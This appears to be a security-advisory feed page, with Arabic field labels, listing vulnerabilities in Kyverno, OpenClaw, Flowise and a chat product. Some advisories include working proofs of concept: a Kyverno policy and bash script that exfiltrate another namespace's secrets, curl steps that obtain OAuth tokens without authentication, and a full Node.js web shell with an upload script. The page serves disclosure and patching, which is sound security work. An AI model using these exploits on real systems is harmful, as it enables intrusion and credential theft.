ClusterPolicy is a cluster-scoped resource, so creating one requires cluster-level RBAC. But in practice, platform teams often grant policy-write to team leads or automation pipelines. The auto-injection of the SA token is the unexpected part — nobody expects writing a policy to leak the controller's credentials.

الإصدارات المتأثرة

1.16.4

نوع الثغرة

CWE-200 — Info Disclosure

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

المراجع

الوصف الكامل

### Summary CVE-2026-22039 fixed cross-namespace privilege escalation in Kyverno's `apiCall` context by validating the `URLPath` field. However, the **ConfigMap context loader has the identical vulnerability** — the `configMap.namespace` field accepts any namespace with zero validation, allowing a namespace admin to read ConfigMaps from any namespace using Kyverno's privileged service account. This is a complete RBAC bypass in multi-tenant Kubernetes clusters. ### Details **Root cause:** The CVE-2026-22039 fix in `pkg/engine/apicall/apiCall.go` (lines 73-83) validates that `URLPath` references only the policy's own namespace using regex. However, the ConfigMap context loader at `pkg/engine/context/loaders/configmap.go` performs **no namespace validation** on the `namespace` field. **Code path comparison:** | | CVE-2026-22039 (fixed) | This vulnerability (unfixed) | |--|---|---| | **Location** | `apiCall.URLPath` field | `configMap.namespace` field | | **Code path** | `apicall.Fetch()` → namespace regex validation | `configmap.NewConfigMapLoader()` → no validation | | **Root cause** | Variable substitution + missing validation | Same pattern, still unpatched | **Exploit mechanism:** 1. Namespace admin creates a Kyverno Policy in their namespace (standard RBAC) 2. Policy uses `context.configMap.namespace: "victim-ns"` to reference another namespace 3. Kyverno's admission controller service account (has cluster-wide `view` role) fetches the ConfigMap 4. Policy mutates a trigger ConfigMap to exfiltrate the stolen data via annotations **Affected code:** `pkg/engine/context/loaders/configmap.go` - `NewConfigMapLoader()` does not validate resolved namespace against policy namespace. ### PoC Full reproduction (5 minutes on `kind`): ```bash #!/bin/bash # Setup: kind cluster + Kyverno v1.17.0 kind create cluster --name kyverno-poc --wait 60s helm repo add kyverno https://kyverno.github.io/kyverno/ helm install kyverno kyverno/kyverno --namespace kyverno --create-namespace --version 3.7.0 --wait # Create attacker and victim namespaces kubectl create namespace attacker-ns kubectl create namespace victim-ns # Plant sensitive data in victim namespace kubectl create configmap sensitive-config -n victim-ns \ --from-literal=db-password="s3cr3t-p4ssw0rd" \ --from-literal=api-key="AKIAIOSFODNN7EXAMPLE" # Create namespace admin RBAC (standard multi-tenant setup) kubectl create serviceaccount ns-admin -n attacker-ns kubectl create rolebinding ns-admin-binding --clusterrole=admin \ --serviceaccount=attacker-ns:ns-admin --namespace=attacker-ns kubectl create role kyverno-policy-creator --verb=create,get,list \ --resource=policies.kyverno.io --namespace=attacker-ns kubectl create rolebinding kyverno-policy-binding --role=kyverno-policy-creator \ --serviceaccount=attacker-ns:ns-admin --namespace=attacker-ns # Verify namespace admin CANNOT directly access victim-ns kubectl get configmap sensitive-config -n victim-ns \ --as=system:serviceaccount:attacker-ns:ns-admin # Error: Forbidden (expected) ``` **Exploit policy:** ```yaml # Apply as namespace admin apiVersion: kyverno.io/v1 kind: Policy metadata: name: configmap-crossns-read namespace: attacker-ns spec: rules: - name: steal-configmap match: any: - resources: kinds: [ConfigMap] names: ["trigger-cm"] context: - name: stolendata configMap: name: "sensitive-config" namespace: "victim-ns" # <-- NO VALIDATION mutate: patchStrategicMerge: metadata: annotations: exfil-db-password: "{{ stolendata.data.\"db-password\" }}" exfil-api-key: "{{ stolendata.data.\"api-key\" }}" ``` **Trigger and exfiltrate:** ```bash # Trigger policy (as namespace admin) kubectl apply -f - <<EOF apiVersion: v1 kind: ConfigMap metadata: name: trigger-cm namespace: attacker-ns data: innocent: "data" EOF # Read exfiltrated secrets kubectl get configmap trigger-cm -n attacker-ns -o jsonpath='{.metadata.annotations}' \ --as=system:serviceaccount:attacker-ns:ns-admin | python3 -m json.tool # Output: # { # "exfil-api-key": "AKIAIOSFODNN7EXAMPLE", # "exfil-db-password": "s3cr3t-p4ssw0rd" # } ``` **Result:** Namespace admin successfully read secrets from `victim-ns` despite having NO RBAC access. ### Impact **Severity: HIGH (CVSS 7.7)** **Who is affected:** - Any Kubernetes cluster running Kyverno v1.17.0 (and earlier) with namespace-scoped Policy creation enabled (default) - Multi-tenant clusters where ConfigMaps contain sensitive data - Azure Kubernetes Service (AKS) and other managed K8s using Kyverno **Attack prerequisites:** - Namespace admin privileges (standard RBAC in multi-tenant clusters) - Ability to create Kyverno Policy resources (default for namespace admins) - No cluster-admin required **What can be exfiltrated:** - Any ConfigMap from any namespace - Common targets: database credentials, API keys, service configurations, application secrets stored in ConfigMaps **Why this matters:** - Namespace isolation is a fundamental Kubernetes security boundary - Namespace admin is an expected, common RBAC level in production multi-tenant clusters - Violates the principle of least privilege and breaks multi-tenancy guarantees **Suggested fix:** Apply the same namespace validation from `apicall.Fetch()` to `configmap.NewConfigMapLoader()`: 1. Pass `policyNamespace` to `NewConfigMapLoader()` 2. After variable substitution on `namespace`, validate resolved namespace == `policyNamespace` 3. Return error if validation fails Also audit other context loaders (`globalReference`, `imageRegistry`, `variable`) for the same pattern. **Tested versions:** - Kyverno: v1.17.0 (latest, includes CVE-2026-22039 fix) - Helm chart: 3.7.0 - Kubernetes: v1.35.0 (kind)

الإصدارات المتأثرة

1.17.2

نوع الثغرة

CWE-863 — Incorrect Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

المراجع

الوصف الكامل

In versions <8.4.0, <8.3.2, <8.2.2, <8.1.3, <8.0.4, <7.13.6, <7.12.7, <7.11.7, and <7.10.10, the endpoints /api/apps/logs and /api/apps/:id/logs have a typo in the required permission check, allowing authenticated users without the proper permissions to read apps-engine logs.

الإصدارات المتأثرة

7.10.0 - 7.10.10

نوع الثغرة

CWE-284 — CWE-284

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

المراجع

الوصف الكامل

## Summary Before OpenClaw 2026.4.2, Slack thread starter and thread-history context fetched through the API was not filtered by the effective sender allowlist. Messages from non-allowlisted senders could still enter the agent context when an allowlisted user replied in the same thread. ## Impact A Slack deployment that relied on sender allowlists could still feed non-allowlisted thread content into the model context through thread history. This was a sender-access-control bypass on Slack thread context, not a direct channel-auth bypass. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `ac5bc4fb37becc64a2ec314864cca1565e921f2d` — filter Slack thread context by the effective allowlist ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. OpenClaw thanks @AntAISecurityLab for reporting.

نوع الثغرة

CWE-346 — CWE-346

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

المراجع

الوصف الكامل

## Summary Before OpenClaw 2026.4.2, Zalo webhook replay dedupe keys were not scoped strongly enough across chat and sender dimensions. Legitimate events from different conversations or senders could collide and be dropped as duplicates. ## Impact Cross-conversation or cross-sender collisions could cause silent message suppression and break bot workflows. This was an availability issue in webhook event processing. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `ef7c553dd16ee579f1d1a363f5881a99726c1412` — scope Zalo webhook replay dedupe across the missing event dimensions ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @D0ub1e-D for reporting.

نوع الثغرة

CWE-706 — CWE-706

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

المراجع

الوصف الكامل

## Summary Discord Slash Commands Bypass Group DM Channel Allowlist ## Current Maintainer Triage - Status: narrow - Normalized severity: moderate - Assessment: v2026.3.28 native Discord slash and autocomplete paths still skip the group-DM allowlist, but impact is limited to already-authorized Discord users bypassing a channel restriction rather than crossing a stronger trust boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `8fdb19676ab44cf85d47ee13c578195f2e527591` — 2026-03-30T11:17:36-06:00 OpenClaw thanks @nexrin for reporting.

الإصدارات المتأثرة

2026.3.31

نوع الثغرة

CWE-863 — Incorrect Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

المراجع

الوصف الكامل

## Summary The `chat.send` path let authorized write-scoped callers persist `/verbose` session overrides even though the same stored session mutation is admin-only through `sessions.patch`. ## Impact A write-scoped gateway caller could persist verbose output for later runs and expose more reasoning or tool output than the operator intended. ## Affected Component `src/auto-reply/reply/directive-handling.impl.ts, src/gateway/sessions-patch.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `c603123528` (`fix(gateway): require admin for persisted verbose defaults`).

الإصدارات المتأثرة

2026.3.28

نوع الثغرة

CWE-863 — Incorrect Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

المراجع

الوصف الكامل

## Summary Discord Component Interaction Misclassifies Group DM as Direct Message ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: Real on shipped v2026.3.24 component-interaction routing/auth in extensions/discord/src/monitor/agent-components-helpers.ts, but impact is limited to Group DM policy or session misclassification. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `8c83128fc38d5a3642b8ccbea58550755fdbbbaf` — 2026-03-30T11:17:53-06:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @nexrin for reporting.

الإصدارات المتأثرة

2026.3.31

نوع الثغرة

CWE-351 — CWE-351

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

المراجع

الوصف الكامل

OpenClaw before 2026.3.31 contains an authentication boundary vulnerability where Telegram legacy allowFrom migration incorrectly fans default-account trust into all named accounts. Attackers can exploit this trust propagation to bypass authentication controls and gain unauthorized access to named accounts.

الإصدارات المتأثرة

2026.3.31

نوع الثغرة

CWE-372 — CWE-372

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

المراجع

الوصف الكامل

### Summary The text-to-speech generation endpoint (`POST /api/v1/text-to-speech/generate`) is whitelisted (no auth) and accepts a `credentialId` directly in the request body. When called without a `chatflowId`, the endpoint uses the provided `credentialId` to decrypt the stored credential (e.g., OpenAI or ElevenLabs API key) and generate speech. ### Root Cause ```typescript // packages/server/src/controllers/text-to-speech/index.ts:58-64 } else { // Use TTS config from request body provider = bodyProvider credentialId = bodyCredentialId // ← attacker-controlled credential ID voice = bodyVoice model = bodyModel } ``` ### Docker Validation `POST /api/v1/text-to-speech/generate` with arbitrary `credentialId` in body: endpoint processes request, sends SSE `tts_start` event, only fails when credential doesn't exist — proves code path runs without authentication. ### Impact - Use victim's API keys (OpenAI, ElevenLabs, Azure, Google) without authorization - Burn API credits on the victim's account - Generate unlimited speech content at victim's expense - Combined with credential ID leak from Finding 2, this is trivially exploitable ### Suggested Fix Remove the TTS endpoint from `WHITELIST_URLS` or validate that the credential belongs to the chatflow being used: ```typescript // Only allow credentialId when it matches the chatflow's TTS configuration if (!chatflowId) { return res.status(401).json({ message: 'Authentication required' }) } ``` --- ## References - `packages/server/src/controllers/text-to-speech/index.ts` lines 10-162 - `packages/server/src/utils/constants.ts` line 41 (whitelist entry) ## Credits - Shinobi Security - https://github.com/shinobisecurity

الإصدارات المتأثرة

3.1.0

نوع الثغرة

CWE-639 — IDOR

CVSS Vector

CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

المراجع

الوصف الكامل

### Summary The `GET /api/v1/public-chatflows/:id` endpoint returns the full chatflow object **without sanitization** for public chatflows. Docker validation revealed this is worse than initially assessed: the `sanitizeFlowDataForPublicEndpoint` function does NOT exist in the released v3.0.13 Docker image. Both `public-chatflows` AND `public-chatbotConfig` return completely raw flowData including credential IDs, plaintext API keys, and password-type fields. ### Root Cause ```typescript // packages/server/src/controllers/chatflows/index.ts:218-220 const chatflow = await chatflowsService.getChatflowById(req.params.id) if (!chatflow) return res.status(StatusCodes.NOT_FOUND).json(...) if (chatflow.isPublic) return res.status(StatusCodes.OK).json(chatflow) // ← NO sanitization! ``` ### Docker Validation (v3.0.13) Created public chatflow with credential IDs and passwords in flowData: ```json { "flowData": "{\"nodes\":[{\"data\":{\"credential\":\"e92a39bf-...\",\"inputs\":{\"password\":\"sk-supersecretkey123\",\"apiKey\":\"should-not-leak\"}}}]}" } ``` The `sanitizeFlowDataForPublicEndpoint` function only exists in unreleased HEAD, and even there, only `public-chatbotConfig` calls it — `public-chatflows` never does. ### Impact - **Credential IDs** leaked — enables OAuth2 token theft chain (Finding 1) - **Plaintext API keys and passwords** leaked — direct third-party account compromise - **Node configurations** leaked — reveals internal architecture and endpoint URLs - Both `public-chatflows` and `public-chatbotConfig` are affected in the released version ### Suggested Fix Apply sanitization to both public endpoints: ```typescript const sanitized = sanitizeFlowDataForPublicEndpoint(chatflow) return res.status(StatusCodes.OK).json(sanitized) ``` Ensure the sanitization function strips all `credential`, `password`, `apiKey`, and `secretKey` fields from `flowData`. --- ## References - `packages/server/src/controllers/chatflows/index.ts` lines 209-236 - `packages/server/src/utils/sanitizeFlowData.ts` lines 11-34 (exists only in unreleased HEAD) ## Credits - Shinobi Security - https://github.com/shinobisecurity

الإصدارات المتأثرة

3.1.0

نوع الثغرة

CWE-200 — Info Disclosure

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

المراجع

الوصف الكامل

### Summary Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow. By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication. ### Details Flowise is designed to allow public chatflows to be accessed by unauthenticated end users via public URLs or embedded widgets. As a result, `chatflowId` values are intentionally exposed to unauthenticated clients and must not be treated as secrets. However, the endpoint `GET /api/v1/public-chatbotConfig/<chatflowId>` returns internal `flowData` without authentication. The returned `flowData` includes workflow node definitions containing OAuth credential identifiers (`credential` field). Separately, the endpoint `POST /api/v1/oauth2-credential/refresh/<credentialId>` allows OAuth. 2.0 tokens to be refreshed without authentication or authorization checks. Because credential identifiers can be obtained from the unauthenticated public chatflow configuration endpoint, these two behaviors can be combined to allow unauthenticated OAuth 2.0 access token disclosure. ### PoC **Prerequisites** - Self-hosted Flowise instance - A public chatflow configured with an OAuth 2.0 credential (e.g., Gmail OAuth2) #### Step 1: Obtain `chatflowId` The `chatflowId` is exposed to unauthenticated users via public chatflow URLs, embedded widgets, or browser network requests when accessing a public chatflow. Example: `d37b9812-72c1-4c64-b152-665f307f755e` #### Step 2: Retrieve internal `flowData` without authentication ```bash curl -s \ http://localhost:3000/api/v1/public-chatbotConfig/d37b9812-72c1-4c64-b152-665f307f755e ``` The response includes flowData containing an OAuth credential identifier, for example: ``` "credential": "6efe0e20-ba6f-4fbb-9960-658feffa0542" ``` #### Step 3: Refresh OAuth 2.0 token without authentication ```bash curl -X POST \ http://localhost:3000/api/v1/oauth2-credential/refresh/6efe0e20-ba6f-4fbb-9960-658feffa0542 ``` The response returns valid OAuth 2.0 access token data, including an `access_token`. ### Impact An unauthenticated attacker can obtain OAuth 2.0 access tokens for third-party services configured in Flowise, potentially leading to unauthorized data access, API abuse, or account compromise. This vulnerability affects self-hosted deployments because public chatflows are commonly exposed to the internet and require unauthenticated access by design. Treating `chatflowId` as a secret does not mitigate the issue.

الإصدارات المتأثرة

3.1.0

نوع الثغرة

CWE-306 — Auth Bypass

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

المراجع

الوصف الكامل

### Summary In FlowiseAI, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). ### Details This is a bypass of [GHSA‑35g6‑rrw3‑v6xc](https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc) (CVE‑2025‑61687). The Chatflow file upload settings do not properly validate MIME types. An attacker can add the `application/javascript` MIME type when updating a Chatflow, allowing .js files to be uploaded. JavaScript files are not listed as an option for file upload types within web user interface: <img width="1162" height="440" alt="Screenshot 2026-01-08 152306" src="https://github.com/user-attachments/assets/f33f04af-877e-4aac-95a7-86d4684891de" /> ### PoC #### shell.js (Node.js Web Shell) ``` const { exec } = require('child_process'); const http = require('http'); const server = http.createServer((req, res) => { const url = new URL(req.url, 'http://localhost'); const cmd = url.searchParams.get('cmd'); if (cmd) { console.log(`Executing: ${cmd}`); exec(cmd, (error, stdout, stderr) => { res.writeHead(200, {'Content-Type': 'text/plain'}); if (error) { res.end(`Error: ${error.message}\n${stderr || ''}`); } else { res.end(stdout || 'Command executed successfully'); } }); } else { res.writeHead(200, {'Content-Type': 'text/html'}); res.end(` <h1>Node.js Web Shell</h1> <p>Use ?cmd=command to execute</p> <p>Example: ?cmd=id</p> `); } }); const PORT = 8888; server.listen(PORT, '0.0.0.0', () => { console.log(`Shell running on port ${PORT}`); console.log(`Access: http://localhost:${PORT}?cmd=id`); }); ``` #### Python Upload Script ``` import requests import uuid TARGET_URL = "http://192.168.236.131:3000" CHATFLOW_ID = "dfd67fff-23b5-4f62-a0b3-59963cabc3b2" cookie_str = 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOTRiOGY2MTIyMzI3ZmFmODg0YzM4OGM4Y2YwZTg3ZGU6MTVkNDc4MDFjNTQ0N2Q3NDU2Mzg3OWE2N2E5YmJjNmM0M2JiYjYzNDE0Y2MzZWY2ZThkYjAzZTRhNjM3MjBiNzA5NmI3YmIwMGM3YWI3YTRmM2QzN2E2OTRiMGVmY2UzOTFiZGU3MWJiNWViZDIyN2ZhNzc0NmQ0ZjFmNTM5NTFhOGJkNjdlMzEyZjMzOTk5OWQ0ZGNkYmVmYWU3OWI4NSIsImlhdCI6MTc2Nzg1ODE2NSwibmJmIjoxNzY3ODU4MTY1LCJleHAiOjE3Njc4NjE3NjUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.lUtIFztKIT6Ld8cnPaPnPfm0B47yhurPJRW6JhtSwu8; refreshToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOThmZGE5YWE2MDZhYTA3YTMxYjZlYzhjZTkyMmZkMDA6ZTU2ZTczMTEwYjY3ZDE3ZTM3MjViZWI2YzMyYWYzNTNkOWExNzIzZWU0NzdiN2ZiMDQ1N2Q0M2JmZTY0NTIxZTlkNjM2ZWQwODgxNWJiNzU4Mjg2ZDQ3OGMwNTA3NTRkZTgwMWIwODljNDQ5YjhhZjVkODU2YWFiMzk4NTBjNjNlZjRmY2UzMmY4YWYzZmQxNGQzMmVhYzVhYjVmM2NjZCIsImlhdCI6MTc2Nzg1MzU4NSwibmJmIjoxNzY3ODUzNTg1LCJleHAiOjE3NzU2Mjk1ODUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.U3mm0ONOeGFP1gD-mPT90Iz_Ewwf-YXzmTPwoOEHG_g; connect.sid=s%3Avwp7SDKi02Mzu_nTF3-IZ-RfgmMnnp5o.K7kb5eg9CJ%2FuxupG4rJrT6I0fu0H93OTd5trNC0u88Y' js_mime_type = 'application/javascript' CHAT_ID = str(uuid.uuid4()) def configure_chatflow_uploadfile(): url = f"{TARGET_URL}/api/v1/chatflows/{CHATFLOW_ID}" headers = {'Cookie': cookie_str, 'x-request-from': 'internal'} chatbot_configdata = {"chatbotConfig":'{\"fullFileUpload\":{\"status\":true,\"allowedUploadFileTypes\":\"' + js_mime_type + ',text/css,text/csv,text/html,application/json,text/markdown,application/x-yaml,application/pdf,application/sql,text/plain,application/xml,application/msword,application/vnd.openxmlformats-officedocument.wordprocessingml.document,application/vnd.openxmlformats-officedocument.spreadsheetml.sheet,application/vnd.openxmlformats-officedocument.presentationml.presentation\",\"pdfFile\":{\"usage\":\"perPage\",\"legacyBuild\":false}}}'} r = requests.put(url, headers=headers, json = chatbot_configdata) if js_mime_type in r.text: print("[+] Enabled .js file uploads") else: print("[-] Failed to enable .js file uploads") def upload_shell(): url = f"{TARGET_URL}/api/v1/attachments/{CHATFLOW_ID}/{CHAT_ID}" headers = {'Cookie': cookie_str} files = {'files': ('shell.js', open('shell.js', 'rb'), 'application/javascript')} r = requests.post(url, headers=headers, files=files) if r.status_code == 200: print("[+] Upload success") print(r.text) else: print(f"[-] Upload failed ({r.status_code})") print(r.text) if __name__ == "__main__": configure_chatflow_uploadfile() upload_shell() ``` <img width="839" height="231" alt="image" src="https://github.com/user-attachments/assets/0d2e8384-8da6-4ada-a81a-a85c49476673" /> ### Impact An attacker can persistently upload and store malicious web shells on the server. If executed, this leads to Remote Code Execution (RCE). The risk increases if administrators unknowingly trigger the shell or if other vulnerabilities are chained to execute the file. This presents a high-severity threat to system integrity and confidentiality.

الإصدارات المتأثرة

3.1.0

نوع الثغرة

CWE-434 — Unrestricted Upload

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

المراجع